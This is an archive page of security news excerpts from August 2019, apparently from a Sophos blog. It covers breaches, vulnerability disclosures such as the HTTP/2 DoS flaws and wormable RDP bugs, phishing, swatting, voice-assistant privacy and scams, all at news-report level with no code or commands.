Repairs & Upgrades

August 19, 2019 »

Did Facebook know about “View As” bug before 2018 breach?

By Lisa Vaas

A recent court filing indicates that Facebook knew about the bug in its View As feature that led to the 2018 data breach – a breach that would turn out to affect nearly 29 million accounts – and that it protected its employees from repercussions of that bug, but that it didn’t bother to warn users.

There was a class action lawsuit – Carla Echavarria and Derrick Walker v. Facebook, Inc.filed within hours of Facebook’s revelations last September that attackers had exploited a vulnerability in its “View As” feature to steal access tokens: the keys that allow you to stay logged into Facebook so you don’t need to re-enter your password every time you use the app.

Reuters reports that the lawsuit in question actually combined several legal actions, presumably including the one filed on the same day as Facebook disclosed the breach.

The breach

As Naked Security’s Paul Ducklin explained at the time, the View As feature lets you preview your profile as other people would see it.

This is supposed to be a security feature that helps you check whether you’re oversharing information you meant to keep private. But crooks figured out to how to exploit a bug (actually, a combination of three different bugs) so that when they logged in as user X and did View As user Y, they essentially became user Y. From Paul:

If user Y was logged into Facebook at the time, even if they weren’t actually active on the site, the crooks could recover the Facebook access token for user Y, potentially giving them access to lots of data about that user.

That’s exactly what attackers did: they took the profile details belonging to some 14 million users, including birth dates, employers, education history, religious preference, types of devices used, pages followed and recent searches and location check-ins.


Multiple HTTP/2 DoS flaws found by Netflix

By Danny Bradbury

Netflix has identified several denial of service (DoS) flaws in numerous implementations of HTTP/2, a popular network protocol that underpins large parts of the web. Exploiting them could make servers grind to a halt.

HTTP/2 is the latest flavour of HTTP, the application protocol that manages communication between web servers and clients. Released in 2015, HTTP/2 introduced several improvements intended to make sessions faster and more reliable.

Updates included:

  • HTTP header compression. In previous HTTP versions, only the body of a request could be compressed, even though for small web pages the headers, which often include data such as cookies and are always sent in text format, could be bigger than the body.
  • Multiplexed streams and binary packets. This made it easier to download multiple items in parallel, speeding up rendering of web pages made up of many parts.
  • Server Push. This means the server can send across cacheable information that the client might need later, even if it hasn’t been requested yet.

Features like these can help reduce latency and improve search engine rankings. The problem is that more complexity means more opportunity for bugs.

Netflix explains this in its writeup of the issue:

The algorithms and mechanisms for detecting and mitigating “abnormal” behavior are significantly more vague and left as an exercise for the implementer. From a review of various software packages, it appears that this has led to a variety of implementations with a variety of good ideas, but also some weaknesses.

There are eight of those weaknesses, all with their own separate CVE number and nickname.

Some flaws are reminiscent of other non-HTTP/2 DoS attacks.


61 impacted versions of Apache Struts left off security advisories

By Lisa Vaas

Security researchers have reviewed security advisories for Apache Struts and found that two dozen of them inaccurately listed affected versions for the open-source development framework.

The advisories have since been updated to reflect vulnerabilities in an additional 61 unique versions of Struts that were affected by at least one previously disclosed vulnerability but left off the security advisories for those vulnerabilities.

The extensive analysis was done by the Black Duck Security Research (BDSR) team of Synopsys’ Cybersecurity Research Center (CyRC), which investigated 115 distinct releases for Apache Struts and correlated those releases against 57 existing Apache Struts Security Advisories covering 64 vulnerabilities.

Synopsys’ Tim Mackey said in a blog post on Thursday that the danger isn’t that developers and users may have upgraded needlessly. Rather, the real danger is that needed updates may not have happened:

While our findings included the identification of versions that were falsely reported as impacted in the original disclosure, the real risk for consumers of a component is when a vulnerable version is missed in the original assessment. Given that development teams often cache ‘known good’ versions of components in an effort to ensure error-free compilation, under-reporting of impacted versions can have a lasting impact on overall product security.

Case in point: Equifax

Promptly patching security vulnerabilities in Apache Struts is a vital task: you can ask Equifax all about possible ramifications of failing to do so. Equifax blamed a nasty server-side remote code execution (RCE) bug (CVE-2017-5638) for the massive data breach of 2017. The patch had been available for months before the breach, it turned out, but Equifax hadn’t applied it.


iPhone holes and Android malware – how to keep your phone safe

By Paul Ducklin

Recent news stories about mobile phone security – or, more precisely, about mobile phone insecurity – have been more dramatic than usual.

That’s because we’re in what you might call “the month after the week before” – last week being when the annual Black Hat USA conference took place in Las Vegas.

A lot of detailed cybersecurity research gets presented for the first time at that event, so the security stories that emerge after the conference papers have been delivered often dig a lot deeper than usual.

In particular, we heard from two mobile security researchers in Google’s Project Zero team: one looked at the Google Android ecosystem; the other at Apple’s iOS operating system.

Natalie Silvanovich documented a number of zero-day security holes in iOS that crooks could, in theory, trigger remotely just by sending you a message, even if you never got around to opening it.

Maddie Stone described the lamentable state of affairs at some Android phone manufacturers who just weren’t taking security seriously.

Stone described one Android malware sample that infected 21,000,000 devices altogether…

…of which a whopping 7,000,000 were phones delivered with the malware preinstalled, inadvertently bundled in along with the many free apps that some vendors seem to think they can convince us we can’t live without.

But it’s not all doom and gloom, so don’t panic!


Google removes option to disable Nest cams’ status light

By Lisa Vaas

No more stashing your Nest security cameras in the bushes to catch burglars unaware: Google informed users on Wednesday that it’s removing the option to turn off the status light that indicates when your Nest camera is recording.

You can still dim the light that shows when Google’s Nest, Dropcam, and Nest Hello cameras are on and sending video and audio to Nest, Google said, but you can’t make it go away on new cameras. If the camera is on, it’s going to tell people that it’s on – with its green status light in Nest and Nest Home and the blue status light in Dropcam – in furtherance of Google’s newest commitment to privacy.

Google introduced its new privacy commitment at its I/O 2019 developers conference in May, in order to explain how its connected home devices and services work.

The setting that enabled users to turn off the status light is being removed on all new cameras. When the cameras’ live video is streamed from the Nest app, the status light will blink. The update will be done over-the-air for all Nest cams: Google’s update notice said that the company was rolling out the changes as of Wednesday, 14 August 2019.


Police site DDoSer/bomb hoaxer caught after jeering on social media

By Lisa Vaas

A UK man who DDoS-ed police websites was caught and imprisoned after he jeered at police about the attacks on social media.

Liam Reece Watts, 20, targeted the Greater Manchester Police (GMP) website in August 2018 and then the Cheshire Police site in March 2019, according to ITV News. Both of the public-facing websites were each disabled for about a day, The Register reported.

According to news outlets and Watts’s Twitter posts, the distributed denial-of-service (DDoS) attacks were done in retaliation for Watts having been convicted of calling in bomb hoaxes just days after the 2017 Manchester Arena suicide attack left 22 people dead and 500 injured.

Watts, who was 19 at the time of the DDoS attacks, was caught after he taunted police through Twitter. He used the handle Synic: a possible reference to SYN flood, which is a type of DoS attack in which servers are swamped with SYN – i.e., synchronize – messages.

Watts reportedly wrote this in one of his tweets:

@Cheshirepolice want to send me to prison for a bomb hoax I never did, here you f****** go, here is what I’m guilty of.

Watts reportedly posted that tweet while police were still investigating the first DDoS attack on the GMP site in 2018, and before he unleashed the March 2019 attack on the Cheshire Police site.

He reportedly admitted to carrying out the attack after police searched his home.


August 15, 2019 »

Patch time! Microsoft warns of new worm-ready RDP bugs

By Danny Bradbury

Microsoft’s Patch Tuesday bought some very bad news yesterday: more wormable RDP vulnerabilities, this time affecting Windows 10 users.

CVE-2019-1181 and -1182 are critical vulnerabilities in Remote Desktop Services (formerly Windows Terminal) that are wormable – similar to the BlueKeep vulnerability that people have already created exploits for. Wormable means that the exploit could, in theory, be used not only to break into one computer but also to spread itself onwards from there.

These new vulnerabilities, which Microsoft found while it was hardening RDS, can be exploited without user interaction by sending a specially-crafted remote desktop protocol (RDP) message to RDS. Once in, an attacker could install programs, change or delete data, create new accounts with full user rights, and more. CVE-2019-1222 and -1226 also address these flaws.

Unlike BlueKeep, these new RDP vulnerabilities affect Windows 10, including server versions, as well as Windows 7 SP1, Windows Server 2008 R2 SP1, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.

Microsoft said that these vulnerabilities haven’t yet been exploited in the wild, but urged customers to get ahead of the game by patching quickly:

It is important that affected systems are patched as quickly as possible because of the elevated risks associated with wormable vulnerabilities like these, and downloads for these can be found in the Microsoft Security Update Guide.

Computers with network level authentication (NLA) are partly protected, because crooks would need to authenticate before making a request, meaning that an attack couldn’t spread without human interaction on NLA-enabled systems.


Facebook got humans to listen in on some Messenger voice chats

By Lisa Vaas

Facebook has been collecting some voice chats on Messenger and paying contractors to listen to and transcribe them, Bloomberg reported on Tuesday after hearing from rattled contractors who thought that lack of user notification was unethical.

This is past tense: on Tuesday, Facebook said it knocked it off “more than a week ago” following the scrutiny that Apple and Google have gotten over doing the same thing. Bloomberg quoted a statement in which Facebook confirmed that yes, it had been transcribing users’ audio, but that it’s “paused” the practice:

Much like Apple and Google, we paused human review of audio more than a week ago.

Facebook didn’t say if or when it might resume. The company did say, however, that the eavesdropping was opt-in: only users who chose the option in Messenger would have had their voice chats transcribed. The purpose was to vet Facebook’s artificial intelligence’s (AI’s) ability to correctly interpret the voice messages, which, Facebook says, were anonymized.

They’re all doing it – or at least, they were

Facebook is far from the only tech giant to get its human employees to listen in on voice snippets in order to fine-tune their AI and voice recognition technologies: Google, Apple, Microsoft and Amazon have all been doing it.

In April, Bloomberg reported that Amazon employs thousands of people around the world to work on improving its Alexa digital assistant, which powers its line of Echo speakers. Amazon has confirmed that it keeps these recordings indefinitely instead of deleting the data.

It’s sometimes mundane work. It’s sometimes disturbing: contractors and employees have reported hearing what they interpret as sexual assault, children screaming for help, and other recordings that users would be very unlikely to willingly share.


Hacking forum spills rival’s 321,000-member database

By John E Dunn

When users of hacking forums turn on each other, expect things to get messy quickly.

The latest site to find itself on the receiving end of this phenomenon is which last Friday reportedly found its database of 321,000 members and 749,161 unique email addresses leaked on rival site, RaidForums.

We can say that with confidence because by Monday the compromised accounts had become another statistic on the Have I Been Pwned (HIBP) breach database – the industry’s go-to for news of such incidents.

That dated the breach to 21 July, with the stolen data also including things anyone frequenting a forum of this type would rather not be out in the open such as “IP addresses, passwords, private messages, usernames.”

As Ars Technica points out, this isn’t likely to be as serious a data breach as it would be for a more mainstream website.

IP addresses will likely be anonymized using Tor with account email addresses that probably won’t identify the users behind them – this is a cagey hacking forum after all.

As for password security, according to the site’s breach warning, it appears that months before the breach an admin at realized the danger of using weak hashing:

We have changed the hashing algorithm of passwords from myBB default (MD5) to something more advanced a few months ago, which makes it almost impossible to decrypt your passwords.


‘NULL’ license plate gets security researcher $12K in tickets

By Lisa Vaas

A vanity plate reading “NULL” sounded good to security researcher/hacker “Droogie,” at least in theory: maybe it would make his plate invisible to Automatic License Plate Reader (ALPR) systems?!

Maybe entering the characters – NULL is the marker used in structured query system (SQL) databases in order to indicate that a data value doesn’t exist – would just return error messages when his plate was spotted during one of his traffic violations…?

That’s not what happened, he told an audience at the recent Defcon security conference. Instead, $12,000 in traffic violation fines happened.

Forbes quoted Droogie as he reminisced about his initial expectations:

[I thought,] ‘I’m gonna be invisible’. Instead, I got all the tickets.

As the Guardian reports, every single speeding ticket earned by cars that lacked valid license plates wound up getting assigned to Droogie’s car – turning it into a veritable NULL bucket.

I’m not paying those, Droogie told Defconners. An unsympathetic Los Angeles police department had initially told him that the only solution was to change his license plate.

But why should he? He didn’t do anything wrong. He had checked with California’s Division of Motor Vehicles (DMV), found that the “NULL” vanity plate was surprisingly available, and registered it without any problem – “no bugs or anything.”


August 14, 2019 »

Fortnite World Cup champion and family swatted while live streaming

By Lisa Vaas

16-year-old Fortnite player Kyle “Bugha” Giersdorf, recent, $3 million winner of the inaugural World Cup Solo finals, was swatted Sunday night while live streaming his game play, Kotaku reports.

He was live streaming on Twitch.TV, which means that the video recording captured the arrival of the police. Yet again – this isn’t the first time live streamers have had their game play interrupted by police banging at the door – the recording was interrupted by Giersdorf’s father telling him that there were armed police at the door.

“Did he just leave?” one of the players asked, incredulous, as the sound of the game’s gunfire continued and Bugha’s character slumped to the ground.

Yes, he did leave, because there were guns IRL.

After about 10 minutes, Bugha returned, telling his buddies that he’d been swatted. “That was definitely a new one,” he said.

They come in with guns, bro. They literally pulled up, holy sh*t.

He was lucky, Bugha said: it all ended quickly and peacefully, likely due at least in part to the fact that one of the officers was a neighbor:

I was lucky because the one officer, yeah, he lives in our neighborhood.

The situation was far more harrowing for Joshua Peters, a gamer who got swatted while live streaming RuneScape in 2015. His Twitch.TV video showed him just moments after armed police stormed his house, pointed their guns at his 10-year-old brother who answered the door, and forced the gamer himself to lie face down on the floor in yet another swatting incident in the gamer community.


Coinbase explains background to June zero-day Firefox attack

By John E Dunn

Targeted phishing attacks, it is often said, can be difficult for even the wariest organisations to defend themselves against.

But how difficult?

This week’s detailed post-incident analysis of a recent, highly targeted attack on cryptocurrency exchange Coinbase by its chief information officer Philip Martin offers a glimpse into how good these attacks can be.

We’ll start with the punchline – Coinbase successfully resisted the attack, something we could already have guessed when the company tweeted the news in June that it had come under attack.

That snippet also mentioned that the attack deployed two Firefox zero-days, something that immediately grabbed the interest of news reporters as well as Firefox, which issued patches for CVE-2019-11707 and CVE-2019-11708 after Coinbase reported their use by cybercriminals.

Fending off an attack using a combination of two zero-days is already unusually challenging but, according to Martin, the sophistication of the attack didn’t stop there.

It seems the campaign began on 30 May when around a dozen Coinbase employees received an email from someone claiming to be Gregory Harris, a Research Grants Administrator at the University of Cambridge.

This email came from the legitimate Cambridge domain, contained no malicious elements, passed spam detection, and referenced the backgrounds of the recipients.

The approach was so convincing that even as more emails were received over a two-week period, “nothing seemed amiss.”


Fake news doesn’t (always) fool mice

By Lisa Vaas

Mice can’t vote.

They can neither fill in little ovals on ballots nor move voting machine toggles with their itty bitty paws. That’s unfortunate, because the teeny rodents are less inclined than humans to be swayed by the semantics of fake news content in the form of doctored video and audio, according to researchers.

Still, the ability of mice to recognize real vs. fake phonetic construction can come in handy for sniffing out deep fakes. According to researchers at the University of Oregon’s Institute of Neuroscience, who presented their findings during a presentation at the Black Hat security conference last Wednesday (7 August), recent work has shown that “the auditory system of mice resembles closely that of humans in the ability to recognize many complex sound groups.”

Mice do not understand the words, but respond to the stimulus of sounds and can be trained to recognize real vs. fake phonetic construction. We theorize that this may be advantageous in detecting the subtle signals of improper audio manipulation, without being swayed by the semantic content of the speech.

No roomfuls of adorable mice watching YouTube

Jonathan Saunders, one of the project’s researchers, told the BBC that – unfortunately for those who find the notion irresistibly cute – the end goal of the research is not to have battalions of trained mice vetting our news:

While I think the idea of a room full of mice in real time detecting fake audio on YouTube is really adorable, I don’t think that is practical for obvious reasons.

Rather, the goal is to learn from how the mice do it and then to use the insights in order to augment existing automated fakery detection technologies.


Hacked devices can be turned into acoustic weapons

By Lisa Vaas

It’s bad enough that our devices can listen to us, whether it’s to use ultrasound to track us (even if we’re on an anonymous network) or whether it’s voice assistants picking up on our private conversations (including with human contractors listening in).

Now, PricewaterhouseCoopers (PwC) security researcher Matt Wixey brings us news of attacks that can make our devices’ embedded speakers scream at us, be it at inaudible, high-intensity frequencies or audible sounds at hearing-damaging volumes.

On Sunday at the Defcon security conference, he presented a talk on what he calls acoustic cyber-weapons.

Wixey, head of research at PwC’s cyber security practice, said that his experiments were done as part of his PhD research at University College London, where he delves into what he calls “unconventional” uses of sound as applied to security – including digital/physical crossover attacks that use malware to create physical and/or acoustic harm.


If you aren’t already aware of how much damage given sounds can cause, in his slideshow for the Defcon talk, Wixey annotated a decibel chart from Survival Life to show what level of sound will cause…

  1. Your eyes to twitch – 100 dB, or somewhere between a chainsaw and a lawnmower.
  2. Your lungs to collapse/death imminent – 188 dB.
  3. Your bones to shatter and your internal organs to rupture – 194 dB.
  4. Instant death – 200 dB, or the sound of Windows XP starting up*.

(*I’m fairly sure the Windows XP reference is just a joke. But if you want to see what level of noise will cause your eardrums to rupture, check out this training manual from Purdue University.)

Wixey talked about how inflicting “aural barrages” can cause both psychological and physiological effects, from neurasthenia, cardiac neurosis, hypotension, bradycardia, nausea, fatigue, headaches, tinnitus, ear pain and far more.


Chrome Incognito mode detection fix busted by researchers

By Danny Bradbury

Remember that Chrome update that stopped websites from detecting Incognito mode? Well, researchers claim to have found a way around it.

Chrome’s Incognito mode is supposed to let people use computers for browsing sessions without affecting that computer’s history or polluting the browser with session cookies. That means you can search for something on a computer without it showing up there, which is useful for everyone from victims of domestic abuse through to people searching for gifts.

People also discovered another use for incognito mode, though: getting past paywall sites. Incognito mode’s cookie blocking enabled people to start a fresh session with each visit. Visitors to metered paywall sites that provide a certain number of stories for free before demanding a subscription could effectively reset the meter each time they accessed the site.

Sites got wise to this and figured out a way to spot Chrome browsers in Incognito mode. In regular browsing sessions, Chrome uses the chrome.fileSystem API to read and write to the local filesystem. Google disabled that API in Incognito Mode because it never reads or writes cookies during those sessions.


August 13, 2019 »

Android users menaced by pre-installed malware

By John E Dunn

How does malware find its way on to Android smartphones and tablets?

By some margin, it’s by way of Google’s Play Store, which despite repeated efforts to clean it up remains a recurring source of dodgy apps that sit somewhere between suspiciously misleading and downright malicious.

But according to a Black Hat presentation by Google Project Zero researcher Maddie Stone, there’s another route that’s nearly impossible for users to defend themselves against – malicious apps that have been factory pre-installed.

It starts with the sheer number of apps that now come with Android devices out of the box – somewhere between 100 and 400.

Criminals only need to subvert one of those, which has become a particular problem for cheaper smartphones using the Android Open Source Platform (AOSP) as opposed to the licensed ‘stock’ Google version that powers better-known brands.

Chamois botnet

She cited several instances encountered while doing her old job on Google’s Android Security team, including an SMS and click fraud botnet called Chamois which managed to infect at least 21 million devices from 2016 onwards.

The malware behind it proved harder to defeat than anticipated, in part because the company realized in March 2018 that in the case of 7.4 million devices the infection had been pre-installed in the supply chain.


Don’t let the crooks ‘borrow’ your home router as a hacking server

By Paul Ducklin

We’ve written about the trials and tribulations of SSH before.

SSH, short for Secure Shell, is the probably the most common toolkit for remotely managing computers.

Windows users may be more familiar with RDP, or Remote Desktop Protocol, which gives you full graphical remote control of a Windows computer, with access to the regular Windows desktop via mouse and keyboard.

But almost every Linux or Unix sysadmin out there, plus many Windows sysadmins, use SSH as well as or instead of RDP, because of its raw power.

SSH is more generic than RDP, allowing you to run pretty much any program remotely, so you can administer the computer automatically from afar via pre-written scripts, or open up a terminal window and control the remote system interactively by typing in commands live – or do both at the same time.

As a result, crooks who can figure out your SSH password have their own way into your computer, if not your whole network.

SSH also provides you with a feature called network tunneling, whereby you use SSH to create an encrypted network connection or “tunnel” from computer A to B, and then create an onward connection from B to C to do the actual online work you want.

For security conscious users, that’s good – it makes it easy to “skip over” untrusted parts of the network, such as your coffee shop Wi-Fi router.


Scammers recruiting money mules on dating sites is on the rise, says FBI

By Lisa Vaas

There are a lot of boxes to tick off to let a dating site know who you want to get cozy with.

Gay? Hetero? Tall? Short? Left-wing, right-wing, dairy-intolerant, beard-abhorring?

And now, a rising trend: there are more and more suitors looking to tick off a box that would read “mule” if it were that easy to find lovelorn patsies to launder money or run drugs for them. And by “suitors,” I mean romance-scamming crooks, of course.

The FBI’s online crime division – the Internet Crime Complaint Center (IC3) – on Monday issued a warning about the rising number of faux lover-boys and -girls who are turning to online dating sites to run what are known as romance or confidence frauds.

We’ve seen plenty of these scams in past years: FBI numbers show that in 2017, more than 15,000 people filed complaints with the IC3, alleging that they were victims of romance/confidence frauds and reporting losses of more than $211 million. The following year – 2018 – that number skyrocketed by more than 70%: the number of victims filing complaints increased to more than 18,000, and they reported more than $362 million in losses.

Based on the number of victims, this type of fraud was the seventh most commonly reported scam last year. Money-wise, it was the second costliest scam in terms of losses reported by those victims. It’s ensnaring every type of victim, regardless of age, education or income bracket, the FBI says, though the most targeted demographics are the elderly, women, and widows or widowers.

Modus operandi

This is how these swindles go: First, the conman or woman gets their victim’s trust. Then, they try to convince them to send money, whether it’s for an airfare to visit, to ostensibly bail them out when they claim to have gotten arrested en route, to prove they can be trusted, to buy a home for the heartthrob they’ve never met, or for any other of an endless litany of sob stories.


Don’t fall for fake Equifax settlement sites, warns FTC

By Lisa Vaas

Two years ago, we asked this question: Will the Equifax pain ever end?

We can now say that the answer is “Nope, probably not”.

The Federal Trade Commission (FTC) last week said that just one week after it put up a site for people to check whether their data was exposed in the 2017 mega-breach, e-scum have put up bogus Equifax settlement claim sites.

At the legitimate FTC site, people can file a claim for benefits available under the settlement that the FTC and others reached with Equifax. An estimated 147 million potential claimants may be eligible for up to $425 million in compensation from the settlement.

The FTC says that in order to make sure you’re not handing over your personal data to crooks, start your claim at the official website:

Important notes from the FTC: You never have to pay to file a claim to get benefits from the settlement, so if somebody tries to call and talk you into filing a fee for a claim, they’re a scammer for sure.

Once you’re on the official settlement website, you can determine if you’re an eligible claimant. You might shudder at having to hand over personal details, but you will have to enter your last name and the last six digits of your Social Security number (SSN). If the site tells you your personal information was affected by the data theft, you can go ahead and file a claim.


Banking PINs exposed in Monzo secure storage slip-up

By Danny Bradbury

When is a secure PIN not a secure PIN? When you accidentally store it in your log files.

That’s what happened to digital native bank, Monzo, which was left groveling to customers over the weekend after its security blunder.

Monzo is one of the new breed of ‘challenger banks’ that uses financial technology (fintech) systems to subvert older, more established banks. One way of doing that is to abandon boring old brick-and-mortar branches in favour of shiny new smartphone apps. This lets them provide online-only services that can adapt quickly to meet customer demands.

UK-based Monzo bank, started in 2015 through a crowdfunding campaign, serves its customers with an iOS and Android app, along with a debit card that is still usable at ATM machines. Unfortunately, its sophisticated software-driven business model let it down last week. On Sunday, it admitted that it hadn’t been as careful as it could have been with the PINs that customers use to access their account.

Engineers had access to customers’ PINs

The bank explained that it stored these PINs in a secure part of its infrastructure. Unfortunately that wasn’t the only place where it was storing them. An oversight meant that it had also been storing the PINs in the log files that its software engineers use to understand what’s happening in its systems.

Although the log files were encrypted, they were still insecure. The company explained:

Engineers at Monzo have access to these log files as part of their job.

Up to 100 engineers had the right to access those log files, meaning that one bad apple could have stolen them and used them to commit fraud.


August 12, 2019 »

Hacking 4G hotspots – when did you last update?

By Paul Ducklin

Well-known device hacking researchers at cybersecurity company Pen Test Partners have just published an article summarizing the 4G hotspot hacking research they presented at last week’s DEF CON event.

Simply put, a 4G hotspot is a miniaturized, battery-powered, SIM-card-equipped equivalent to your home router.

Home routers typically plug into a mains adapter for power, plug into your phone line or a cable connection for internet connectivity, and accept Wi-Fi or wired network links from your laptops, desktops, smart TVs and so on.

In contrast, 4G hotspots are typically pocket-sized devices, often shaped like a small soap bar, that don’t plug into anything except to charge up their internal battery, usually via a 5V USB port.

Most mobile phones, in fact, include a hotspot feature so that you can share the phone’s 4G connection via the Wi-Fi card in the phone, but self-contained hotspots are still popular, not least because they make it easy to keep your voice and data charges separate.

Indeed, many mobile phone providers offer special deals with a hotspot device and a pre-paid data SIM for home users who can’t or don’t want to get a phone line or cable hookup at home.


Apple will hand out unlocked iPhones to vetted researchers

By Lisa Vaas

It’s been called an iPhone jailbreaker’s golden egg: a so-called “dev-fused” iPhone created for internal use at Apple in order to extract and study the Secure Enclave Processor (SEP).

That golden yolk of a processor handles data encryption on the device that oh so many law enforcement and hacker types spend so much time, respectively, complaining about or cracking for fun, fame and profit.

Those rare, developer-only, “pre-jailbroken” iPhones have many security features disabled – a convenient feature for researchers looking to see how they tick and to discover iPhone zero days, which can be worth millions of dollars.

Well, here’s some good news for a select group of researchers: at the Black Hat 2019 security conference on Thursday, Apple’s head of security, Ivan Krstic, unveiled a new program through which the company is offering some form of pre-dev iPhones, specifically for security researchers.

CNet quoted Krstic:

This is an unprecedented, fully Apple-supported iOS security research platform.

As CNet reports, Apple is calling it the iOS Security Research Device Program. The program will launch next year.

Apple’s only handing out a limited amount of the iPhones, and only to qualified researchers.

These are not exactly like the phones that Apple gives its own security researchers. They’re going to come with what Krstic said are advanced debugging capabilities, but they won’t be as wide open as the jailbroken phones Apple insiders use or which sometimes wind up on the black market, in the form of iPhones that either haven’t completed the production process or which have been reverted to a development state.

Krstic said that the iPhones, while not being that open, will still provide ample details that can be used to hunt for vulnerabilities.


Facebook facial recognition: class action suit gets court’s go ahead

By Lisa Vaas

Yes, yet another US court has reaffirmed, Facebook users can indeed sue the company over its use of facial recognition technology.

The US Court of Appeals for the Ninth Circuit on Thursday affirmed the district court’s certification of a class action suit – Patel v. Facebook – that a steady progression of courts has allowed to proceed since it was first filed in 2015.

Though a stream of courts has refused to let Facebook wiggle out of this lawsuit – and boy oh boy, has it tried – this is the first decision of an American appellate court that directly addresses what the American Civil Liberties Union (ACLU) calls the “unique privacy harms” of the ever-more ubiquitous facial recognition technology, that’s increasingly being foisted on the public without our knowledge or consent.

The lawsuit was initially filed by some Illinois residents under Illinois law, but the parties agreed to transfer the case to the California court.

What the suit claims: Facebook violated Illinois privacy laws by “secretly” amassing users’ biometric data without getting consent from the plaintiffs, Nimesh Patel, Adam Pezen and Carlo Licata, collecting it and squirreling it away in what Facebook claims is the largest privately held database of facial recognition data in the world.


GDPR privacy can be defeated using right of access requests

By John E Dunn

A British researcher has uncovered an ironic security hole in the EU’s General Data Protection Regulation (GDPR) – right of access requests.

Right of access, also called subject access, is the part of the GDPR regulation that allows individuals to ask organisation’s for a copy of any data held on them.

This makes sense because, as with any user privacy system, there must be a legally enforceable mechanism which allows people to check the accuracy and quantity of personal data.

Unfortunately, in what can charitably be described as a massive GDPR teething problem, Oxford University PhD student James Pavur has discovered that too many companies are handing out personal data when asked, without checking who’s asking for it.

In his session entitled GDPArrrrr: Using Privacy Laws to Steal Identities at this week’s Black Hat show, Pavur documents how he decided to see how easy it would be to use right of access requests to ‘steal’ the personal data of his fiancée (with her permission).

After contacting 150 UK and US organisation’s posing as her, the answer was not hard at all.

According to the accounts by journalists who attended the session, for the first 75 contacted by letter, he impersonated her by providing only information he was able to find online – full name, email address, phone numbers – which some companies responded to by supplying her home address.


Blackmailed for Bitcoin – exchange rebuffs $3.5m ransom demand

By Paul Ducklin

Cryptocurrencies are a big deal once again, now that Bitcoin is back over $10,000.

You might think that’s good news for cryptocurrency exchanges, which are businesses that let you trade regular money, such as Euros, Dollars and Pounds, into and out of so-called virtual currencies like Bitcoin, Monero and Dogecoin.

But it’s not all plain sailing – cryptocurrency companies are of particular interest to cybercrooks, and not only for the cryptocoins they hold.

Here’s a story of super-sized digital blackmail aimed at one of the biggest exchanges out there.


As you probably know, business are supposed to make an effort to know their customers (and their suppliers) these days, as a way of making money laundering more difficult.

And know-your-customer (KYC) rules are particularly important for banks and other businesses, including cryptocoin exchanges, that let people put in money at one end, shuffle it around a bit, or even a lot, and later extract it at the other.

The problem with KYC rules is that they force companies to collect and keep personal data that both you and they would much rather not send across the internet – for example, bills that prove your address, bank statements that vouch for the source of your money, scans of your passport to confirm your identity, and more.


Instagram boots ad partner for location tracking and scraping stories

By Lisa Vaas

A “preferred Facebook Marketing Partner” has secretly tracked millions of Instagram users’ locations and stories, Business Insider reported on Wednesday.

Facebook has confirmed that San Francisco-based marketing firm HYP3R scraped huge quantities of data from Instagram in order to build detailed user profiles. Profiles that included users’ physical whereabouts, their bios, their interests, and the photos that were supposed to vanish after 24 hours.

It was all done in “clear violation of Instagram’s rules,” BI reports, and Facebook has subsequently kicked HYP3R to the curb. BI reports that Instagram issued HYP3R a cease and desist letter on Wednesday after the publication presented its findings, booted it off the platform, and tweaked its platform to protect user data.

Here’s the statement that Facebook is sending to media outlets:

HYP3R’s actions were not sanctioned and violate our policies. As a result, we’ve removed them from our platform. We’ve also made a product change that should help prevent other companies from scraping public location pages in this way.

Instagram’s failure to protect location data is a “mystery”

We don’t know exactly how much data HYP3R got at. But as BI notes, the company has publicly bragged about having “a unique dataset of hundreds of millions of the highest value consumers in the world that gives an edge to the leaders in travel and retail.”

According to the publication’s sources, HYP3R sucks in more than 1 million Instagram posts per month, and more than 90% of the data it brags about comes from the platform.

Data scraping is a pervasive problem online, as BI points out. We’ve seen multiple lawsuits, naming big players, brought over the practice. In 2017, for example, a lawsuit was brought against Uber over one of its units – Marketplace Analytics – that allegedly spied on competitors worldwide for years, scraping millions of their records using automated collection systems.


August 6, 2019 »

Google and Apple suspend contractor access to voice recordings

By John E Dunn

Apple and Google have announced that they will limit the way audio recorded by their voice assistants, Siri and Google Assistant, are accessed internally by contractors.

Let’s start with Apple.

Apple’s privacy hump began a week ago when The Guardian ran a story revealing that contractors “regularly hear” all sorts of things Apple customers would probably rather they didn’t, including sexual encounters, business deals, and patient-doctor chats.

Despite Apple’s protestations that such recordings are pseudonymised and only accessed to improve Siri’s accuracy, the whistleblower who spoke to the newspaper was adamant that in some cases:

These recordings are accompanied by user data showing location, contact details, and app data.

Apple now says it has suspended the global program under which voice recordings were being accessed in this way while it conducts a review.

It’s not clear how long this will remain in force, nor whether the company will adjust the time period it keeps recordings on its servers (currently between six months and two years).

By interesting coincidence, Google finds itself in a similar fix. Germany’s privacy regulator recently started asking questions after Belgian broadcaster VRT ran a story last month on contractors listening to Google Assistant recordings. Google’s privacy fig leaf:

We don’t associate audio clips with user accounts during the review process, and only perform reviews for around 0.2% of all clips.

Nevertheless, Google now says it has also suspended access to recordings in the EU for three months.

It was Amazon which started this ball rolling in April when a Bloomberg report reported that revealed that – yes – recordings stored by its Alexa voice assistant were being accessed by contractors.


Hackers exploit SMS gateways to text millions of US numbers

By John E Dunn

Receive any strange SMS text messages recently?

If you live in the US, there’s a small chance you might have received an SMS with the following text in the last few days from someone called ‘j3ws3r on Twitter’:

I’m here to warn the masses about SMS email gateways. Please look up how to disable it on your phone or call your provider and ask.

Judging from responses on Twitter, the chances of receiving one of these is currently low, although it’s also possible some phone users either ignored the message or deleted it out of habit.

(The text also begins with a promotional link to controversial YouTuber PewDiePie, a clue to its origins which we’ll get to shortly.)

Of the few recipients who took to Twitter to ask about the message, most seem concerned about how the senders got hold of their mobile number.

In fact, they didn’t have to because according to Wired the whole campaign was generated by writing a script that generates every possible mobile number between 1111111 and 9999999 and bolts these to a list of every US area code.

How were the texts sent?

It seems that a single Unix command was used to send the messages to the email-to-SMS gateways used by all 26 major US carriers, which in theory will have forwarded them to legitimate numbers.


FileZilla fixes show how far we’ve come since Heartbleed

By Mark Stockley

Users of FileZilla, the popular open source FTP client, may have noticed a rather serious looking bug described in the change log for the latest update:

Filenames containing double-quotation marks were not escaped correctly when selected for opening/editing. Depending on the associated program, parts of the filename could be interpreted as commands.

Fixed in version 3.43.0, the flaw is one of seven separate security bugs whose discovery is credited to a bug bounty program run by the European Union, of all things.

The EU’s bureaucratic tentacles reach into many things, but a bit of freeware from an area when cover CDs were a thing still seems an odd place to find them.

Explaining why requires a brief trip down memory lane…

Eric S. Raymond’s seminal work on open source, The Cathedral and the Bazaar, taught us that “given enough eyeballs, all bugs are shallow”.

